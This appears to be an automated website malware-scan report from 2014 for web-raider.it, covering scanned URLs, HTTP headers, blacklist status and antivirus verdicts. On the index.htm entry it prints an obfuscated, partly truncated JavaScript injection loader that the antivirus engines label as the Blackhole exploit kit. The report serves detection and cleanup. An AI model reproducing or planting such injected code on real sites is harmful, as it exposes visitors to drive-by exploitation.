New scan:

Malware Scanner report for web-raider.it

Malicious/Suspicious/Total urls checked
1/0/7
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "web-raider.it" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=web-raider.it

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://web-raider.it/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 07 Jun 2014 20:16:03 GMT
Location: http://www.web-raider.it/
Server: Apache
Content-Length: 233
Content-Type: text/html; charset=iso-8859-1
clean
http://www.web-raider.it/
HTTP/1.1 200 OK
Date: Sat, 07 Jun 2014 20:16:03 GMT
Accept-Ranges: bytes
ETag: "6282cc1f7eb9ce1:4ea04f"
Server: Microsoft-IIS/6.0
Content-Length: 15068
Content-Location: http://www.web-raider.it/index.htm
Content-Type: text/html
Last-Modified: Tue, 24 Sep 2013 23:30:59 GMT
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
clean
http://www.web-raider.it/index.htm
200 OK
Content-Length: 15068
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

pkoklv="y";ylwudq="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)++(window[ylwudq].body)==null}()}catch(gcaixy){brccm=function(nxmcr){nxmcr="fr"+"omCh"+nxmcr;for(ubded=0;ubded<pkoklv.length;ubded++){bhqsk+=String[nxmcr](mdzoiq(ttoey+(pkoklv[ubded]))-(71));}};};mdzoiq=(window.eval);ttoey="0x";emp=0;try{;}catch(twyr){emp=1}if(!emp){try{++mdzoiq(ylwudq)["\x62o"+"d"+pkoklv]}catch(gcaixy){olpyip="^";}pkoklv="67^ad^bc^b5^aa^bb^b0^b6^b5^67^b8^b7^ad^ae^c1^77^80^6f^70^67^c2^54^51^67^
... 3824 bytes are skipped ...
^b5^73^67^ac^b5^ab^67^70^67^70^82^54^51^c4^54^51^b0^ad^67^6f^b5^a8^bd^b0^ae^a8^bb^b6^b9^75^aa^b6^b6^b2^b0^ac^8c^b5^a8^a9^b3^ac^ab^70^54^51^c2^54^51^b0^ad^6f^8e^ac^bb^8a^b6^b6^b2^b0^ac^6f^6e^bd^b0^ba^b0^bb^ac^ab^a6^bc^b8^6e^70^84^84^7c^7c^70^c2^c4^ac^b3^ba^ac^c2^9a^ac^bb^8a^b6^b6^b2^b0^ac^6f^6e^bd^b0^ba^b0^bb^ac^ab^a6^bc^b8^6e^73^67^6e^7c^7c^6e^73^67^6e^78^6e^73^67^6e^76^6e^70^82^54^51^54^51^b8^b7^ad^ae^c1^77^80^6f^70^82^54^51^c4^54^51^c4".split(olpyip);bhqsk="";brccm("arCode");mdzoiq(""+bhqsk);}

Antivirus reports:

AntiVir
JS/Blacole.NY.3
Avast
JS:Includer-ALK [Trj]
Bkav
MW.Clod55e.Trojan.63ae
Ikarus
JS.Exploit.BlackHole
nProtect
JS:Exploit.BlackHole.EB
TrendMicro-HouseCall
TROJ_GEN.F47V1027
Comodo
UnclassifiedMalware
Emsisoft
JS:Exploit.BlackHole.EB (B)
McAfee-GW-Edition
JS/Exploit-Blacole.gc
Microsoft
Exploit:JS/Blacole.NY
MicroWorld-eScan
JS:Exploit.BlackHole.EB
Fortinet
JS/Kryptik.HOL!tr
McAfee
JS/Exploit-Blacole.gc
NANO-Antivirus
Trojan.Script.Expack.chwlwn
F-Secure
JS:Exploit.BlackHole.EB
AVG
Script/Exploit.Kit
Norman
Blacole.WV
GData
JS:Exploit.BlackHole.EB
BitDefender
JS:Exploit.BlackHole.EB

http://pagead2.googlesyndication.com/pagead/show_ads.js
200 OK
Content-Length: 19942
Content-Type: text/javascript
clean
http://codice.shinystat.it/cgi-bin/getcod.cgi?USER=webraider
200 OK
Content-Length: 2864
Content-Type: application/x-javascript
clean
http://web-raider.it/test404page.js
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 07 Jun 2014 20:16:05 GMT
Location: http://www.web-raider.it/test404page.js
Server: Apache
Content-Length: 247
Content-Type: text/html; charset=iso-8859-1
clean
http://www.web-raider.it/test404page.js
404 Not Found
Content-Length: 1635
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: web-raider.it

Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 07 Jun 2014 20:16:03 GMT
Location: http://www.web-raider.it/
Server: Apache
Content-Length: 233
Content-Type: text/html; charset=iso-8859-1

...233 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: web-raider.it
Referer: http://www.google.com/search?q=web-raider.it

Result:
The result is similar to the first query. There are no suspicious redirects found.